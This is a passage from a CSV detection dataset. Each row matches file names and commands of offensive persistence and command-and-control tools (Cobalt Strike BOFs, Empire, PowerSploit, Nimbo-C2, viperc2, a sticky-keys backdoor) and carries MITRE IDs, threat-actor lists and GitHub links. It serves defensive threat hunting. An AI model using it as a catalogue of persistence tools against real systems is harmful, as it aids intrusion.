"*persist exceladdin*",".{0,1000}persist\sexceladdin.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54672"
"*persist logonscript*",".{0,1000}persist\slogonscript.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54673"
"*persist run *hkcu*",".{0,1000}persist\srun\s.{0,1000}hkcu.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","54674"
"*persist run *hklm*",".{0,1000}persist\srun\s.{0,1000}hklm.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#registry","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","54675"
"*persist runkey*",".{0,1000}persist\srunkey.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54676"
"*persist spe *.exe*",".{0,1000}persist\sspe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","54677"
"*Persist.cna*",".{0,1000}Persist\.cna.{0,1000}","offensive_tool_keyword","AggressorScripts-1","persistence script for cobaltstrike. Persistence Aggressor Scripts for Cobalt Strike 3.0+","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/Cn33liz/AggressorScripts-1/tree/master/Persistence","1","1","N/A","N/A","N/A","1","2","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z","54678"
"*Persist\autorun.cs*",".{0,1000}Persist\\autorun\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54679"
"*Persist\eventviewer.cs*",".{0,1000}Persist\\eventviewer\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54680"
"*Persist\powershell.cs*",".{0,1000}Persist\\powershell\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54681"
"*Persist\screensaver.cs*",".{0,1000}Persist\\screensaver\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54682"
"*Persist\startup.cs*",".{0,1000}Persist\\startup\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54683"
"*Persist\winlogon.cs*",".{0,1000}Persist\\winlogon\.cs.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","54684"
"*PersistBOF.cna*",".{0,1000}PersistBOF\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54685"
"*Persistence.exe*",".{0,1000}Persistence\.exe.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","54686"
"*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","54687"
"*Persistence.psm1*",".{0,1000}Persistence\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","54688"
"*Persistence/InstallWMI*",".{0,1000}Persistence\/InstallWMI.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","54689"
"*persistence/userland/backdoor_lnk*",".{0,1000}persistence\/userland\/backdoor_lnk.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","54690"
"*Persistence_AccountManipulation_Windows.py*",".{0,1000}Persistence_AccountManipulation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54691"
"*Persistence_Guard_Windows.py*",".{0,1000}Persistence_Guard_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54692"
"*Persistence_LogonScripts_Windows.py*",".{0,1000}Persistence_LogonScripts_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54693"
"*Persistence_NewService_Windows.py*",".{0,1000}Persistence_NewService_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54694"
"*Persistence_OfficeApplicationStartup_OfficeTest.py*",".{0,1000}Persistence_OfficeApplicationStartup_OfficeTest\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54695"
"*Persistence_Other_WindowsLibraryMs.py*",".{0,1000}Persistence_Other_WindowsLibraryMs\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54696"
"*Persistence_RegistryRunKeys_SharpHide.py*",".{0,1000}Persistence_RegistryRunKeys_SharpHide\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54697"
"*Persistence_RegistryRunKeys_Windows.py*",".{0,1000}Persistence_RegistryRunKeys_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54698"
"*Persistence_ScheduledTask_Windows.py*",".{0,1000}Persistence_ScheduledTask_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54699"
"*Persistence_WinlogonHelperDLL_Windows.py*",".{0,1000}Persistence_WinlogonHelperDLL_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","54700"
"*Persistence-Accessibility-Features-master*",".{0,1000}Persistence\-Accessibility\-Features\-master.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","54701"
"*PersistenceBOF.c*",".{0,1000}PersistenceBOF\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54702"
"*PersistenceBOF.exe*",".{0,1000}PersistenceBOF\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54703"
"*persistent-security/SMShell*",".{0,1000}persistent\-security\/SMShell.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","54704"
"*persist-ice-junction.o*",".{0,1000}persist\-ice\-junction\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54705"
"*persist-ice-monitor.o*",".{0,1000}persist\-ice\-monitor\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","N/A","10","10","274","44","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z","54706"
"*persist-ice-shortcut.o*",".{0,1000}persist\-ice\-shortcut\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider 